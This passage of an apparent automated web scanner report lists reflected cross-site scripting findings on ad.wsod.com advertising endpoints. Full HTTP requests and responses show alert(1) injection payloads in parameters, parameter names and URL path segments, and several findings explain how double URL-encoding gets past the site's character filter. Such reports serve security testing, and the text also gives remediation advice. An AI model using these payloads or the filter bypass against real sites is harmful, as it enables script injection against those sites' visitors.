The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort%3Ddate_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x001D4C%2520?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30622'-alert(1)-'bd62721e82e was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort%3Ddate_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x001D4C%2520?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834**;10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort%3Ddate_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x001D4C%2520?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f30622'-alert(1)-'bd62721e82e HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?sort=date&source=%27%22%20ns=%20netsparker(0x001D4C)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=23:257:656:6:0:44608:1303389829:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Sun, 22-May-2011 12:44:21 GMT; path=/
Set-Cookie: i_1=23:257:1074:6:0:44608:1303389861:L|23:257:656:6:0:44608:1303389829:L; expires=Sat, 21-May-2011 12:44:21 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 738

function wsod_image257() {
document.write('<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f30622'-alert(1)-'bd62721e82ehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/257.1074.js.728x90/**;10.2154;1920;1200;http:_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort=date_@26source= ns= netsparker0x001D4C " targe
...[SNIP]...

3.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a9a7'-alert(1)-'d62998691f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389834**;10,2,154;1920;1200;http%3A_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort%3Ddate_@26source%3D%2527%2522%2520ns%3D%2520netsparker0x001D4C%2520?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f&8a9a7'-alert(1)-'d62998691f5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?sort=date&source=%27%22%20ns=%20netsparker(0x001D4C)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=23:257:656:6:0:44608:1303389829:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:46:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Sun, 22-May-2011 12:46:07 GMT; path=/
Set-Cookie: i_1=23:257:1074:6:0:44608:1303389967:L|23:257:656:6:0:44608:1303389829:L; expires=Sat, 21-May-2011 12:46:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 741

function wsod_image257() {
document.write('<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f&8a9a7'-alert(1)-'d62998691f5=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/257.1074.js.728x90/**;10.2154;1920;1200;http:_@2F_@2Fwww.fool.com_@2Fsearch_@2Fsolr.aspx_@3Fsort=date_@26source= ns= netsparker0x001D4C " tar
...[SNIP]...

3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873** [0,0,0;1920;1200;about%3Ablank?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873**

Issue detail

The value of the 0,0,0;1920;1200;about%3Ablank?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e055a'-alert(1)-'b2e89fd1c78 was submitted in the 0,0,0;1920;1200;about%3Ablank?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873**;0,0,0;1920;1200;about%3Ablank?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3fe055a'-alert(1)-'b2e89fd1c78 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db026c8b4223; expires=Sun, 22-May-2011 12:44:56 GMT; path=/
Set-Cookie: i_1=23:257:818:6:0:44608:1303389896:L; expires=Sat, 21-May-2011 12:44:56 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 647

function wsod_image257() {
document.write('<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3fe055a'-alert(1)-'b2e89fd1c78http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/257.818.js.728x90/**;0;1920;1200;about:blank" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57e6a'-alert(1)-'fcf62225d85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/1303389873**;0,0,0;1920;1200;about%3Ablank?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3f&57e6a'-alert(1)-'fcf62225d85=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:45:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db026e41a01f; expires=Sun, 22-May-2011 12:45:24 GMT; path=/
Set-Cookie: i_1=23:257:1074:6:0:44608:1303389924:L; expires=Sat, 21-May-2011 12:45:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 650

function wsod_image257() {
document.write('<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3f&57e6a'-alert(1)-'fcf62225d85=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/257.1074.js.728x90/**;0;1920;1200;about:blank" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

3.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345d8%2522%253balert%25281%2529%252f%252f5dbeefe342c was submitted in the REST URL parameter 2. This input was echoed as 345d8";alert(1)//5dbeefe342c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357345d8%2522%253balert%25281%2529%252f%252f5dbeefe342c/257.0.js.728x90/5546873?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:45:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1698

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357345d8";alert(1)//5dbeefe342c/257.0.js.728x90/1303389937**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/3300
...[SNIP]...

3.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d25e%2522%253balert%25281%2529%252f%252f58282a0edcc was submitted in the REST URL parameter 3. This input was echoed as 9d25e";alert(1)//58282a0edcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x909d25e%2522%253balert%25281%2529%252f%252f58282a0edcc/5546873?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:46:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1698

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x909d25e";alert(1)//58282a0edcc/1303389968**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Ea
...[SNIP]...

3.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd61"-alert(1)-"15ab8f3ad40 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f8cd61"-alert(1)-"15ab8f3ad40 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1698

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
od.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f8cd61"-alert(1)-"15ab8f3ad40">
...[SNIP]...

3.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3a8"-alert(1)-"0f916e6b9a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5546873?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f&aa3a8"-alert(1)-"0f916e6b9a8=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.fool.com/search/solr.aspx?q=Enter+Keywords+or+Ticker&source=%27%22%20ns=%20netsparker(0x000BAB)%20
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1701

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/c%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/1/67/0%3B%7Esscs%3D%3f&aa3a8"-alert(1)-"0f916e6b9a8=1">
...[SNIP]...

3.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d58e%2522%253balert%25281%2529%252f%252fceeac1ce72c was submitted in the REST URL parameter 2. This input was echoed as 6d58e";alert(1)//ceeac1ce72c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313576d58e%2522%253balert%25281%2529%252f%252fceeac1ce72c/257.0.js.728x90/5615436?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1764

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313576d58e";alert(1)//ceeac1ce72c/257.0.js.728x90/1303389981**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/3300
...[SNIP]...

3.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caaaa%2522%253balert%25281%2529%252f%252f113d3c423cd was submitted in the REST URL parameter 3. This input was echoed as caaaa";alert(1)//113d3c423cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90caaaa%2522%253balert%25281%2529%252f%252f113d3c423cd/5615436?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:46:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1764

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90caaaa";alert(1)//113d3c423cd/1303390012**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Ea
...[SNIP]...

3.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e68e9"-alert(1)-"8a80cfad75d was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/257.0.js.728x90/5615436?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B223742579%3B0-0%3B0%3B12692735%3B3454-728/90%3B32991552/33009429/1%3B%3B%7Eaopt%3D2/0/67/0%3B%7Esscs%3D%3fe68e9"-alert(1)-"8a80cfad75d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 21 Apr 2011 12:44:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1764

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
